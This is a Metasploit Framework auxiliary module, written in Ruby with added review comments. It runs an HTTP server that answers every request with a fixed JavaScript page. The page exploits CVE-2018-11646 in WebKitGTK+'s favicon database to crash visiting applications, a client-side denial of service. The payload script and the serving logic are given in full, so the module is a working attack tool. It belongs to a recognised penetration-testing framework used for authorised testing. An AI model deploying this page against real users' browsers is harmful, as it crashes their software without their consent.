rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/webkitplus.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module that starts an HTTP server and answers every request with
# one fixed HTML page. Per the module description, the page targets
# CVE-2018-11646 (WebKitFaviconDatabase with pageURL unset) and may crash the
# visiting WebKitGTK+ application, i.e. a client-side denial of service.
#
# NOTE(review): affected and fixed WebKitGTK+ versions are not stated in this
# file; take them from the WebKit bug listed under 'References'.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Dos

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info = {})
    module_details = {
      'Name' => 'WebKitGTK+ WebKitFaviconDatabase DoS',
      'Description' => %q{
        This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
        If successful, it could lead to application crash, resulting in denial of service.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Dhiraj Mishra', # Original discovery, disclosure
        'Hardik Mehta', # Original discovery, disclosure
        'Zubin Devnani', # Original discovery, disclosure
        'Manuel Caballero' # JS Code
      ],
      'References' => [
        ['EDB', '44842'],
        ['CVE', '2018-11646'],
        ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
        ['URL', 'https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html']
      ],
      'DisclosureDate' => '2018-06-03',
      # Single passive action: the module's only job is to serve the page.
      'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],
      'PassiveActions' => [ 'WebServer' ],
      'DefaultAction' => 'WebServer',
      # Stability is declared as a crash of the target with no recovery.
      # NOTE(review): 'SideEffects' and 'Reliability' are declared empty;
      # confirm that matches what is observed on the client.
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    }

    super(update_info(info, module_details))
  end

  # Entry point for the auxiliary module: hands off to the HttpServer mixin,
  # which starts the HTTP server.
  def run
    exploit
  end

  # Builds the static page once and keeps it in @html for on_request_uri.
  # The script is the one credited to Manuel Caballero ('JS Code') in the
  # author list; it is served verbatim and takes no input from the request.
  def setup
    @html = <<~HTML
      <script type="text/javascript">
      win = window.open("WIN", "WIN");
      window.open("http://example.com/", "WIN");
      win.document.execCommand('stop');
      win.document.write("HelloWorld");
      win.document.close();
      </script>
    HTML
  end

  # Request callback: every request gets the same prebuilt page, whatever
  # its path or headers (the request object is deliberately unused).
  #
  # @param cli the client connection the response is written to
  # @param _request the incoming HTTP request (ignored)
  def on_request_uri(cli, _request)
    print_status('Sending response')
    send_response(cli, @html)
  end
end